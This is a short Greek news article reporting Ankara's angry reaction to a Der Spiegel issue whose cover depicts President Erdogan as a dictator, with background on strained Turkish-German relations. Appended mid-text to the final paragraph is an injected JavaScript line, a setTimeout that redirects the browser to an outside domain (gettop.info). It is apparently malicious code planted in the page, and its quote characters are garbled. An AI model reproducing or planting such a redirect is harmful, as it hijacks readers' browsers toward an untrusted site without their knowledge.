Οργή Τουρκίας για το Spiegel που παρουσιάζει τον Ερντογάν ως δικτάτορα (EIKONA)

0
7

 

Ιδιαίτερα προκλητική χαρακτηρίζει η Άγκυρα την ειδική έκδοση του γερμανικού περιοδικού Der Spiegel που κυκλοφόρησε την Τρίτη και παρουσιάζει τον πρόεδρο της Τουρκίας Ρετζέπ Ταγίπ Ερντογάν ως δικτάτορα.

Το τεύχος του περιοδικού που είναι αφιερωμένο στην Τουρκία και στο εξώφυλλό του φέρει τον τίτλο «Μια χώρα χάνει την ελευθερία της».

Σε ανακοίνωσή του το υπουργείο Εξωτερικών της Τουρκίας τονίζει ότι το τεύχος αντικατοπτρίζει «διαστρεβλωμένη και προκατειλλημένη» εικόνα της χώρας.

«Iδιαίτερα προκλητικό» χαρακτήρισε το εξώφυλλο,o εκπρόσωπος του υπουργείου Εξωτερικών Τανζού Μπιλγκίτς, ιδίως επειδή κυκλόφορησε τη στιγμή που η Τουρκία γιόρταζε το μουσουλμανικό Εΐντ αλ Άντχα (Γιορτή της Θυσίας).

Οι σχέσεις της Άγκυρας με το Βερολίνο είναι τεταμένες εδώ και πολλές εβδομάδες, ιδίως μετά την υιοθέτηση από το γερμανικό κοινοβούλιο απόφασης που αναγνωρίζει τη γενοκτονία των Αρμενίων το 1915 και τις απειλές της Τουρκίας να αναστείλει τη συμφωνία με την Ευρωπαϊκή Ένωση για τον περιορισμό των μεταναστευτικών ροών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here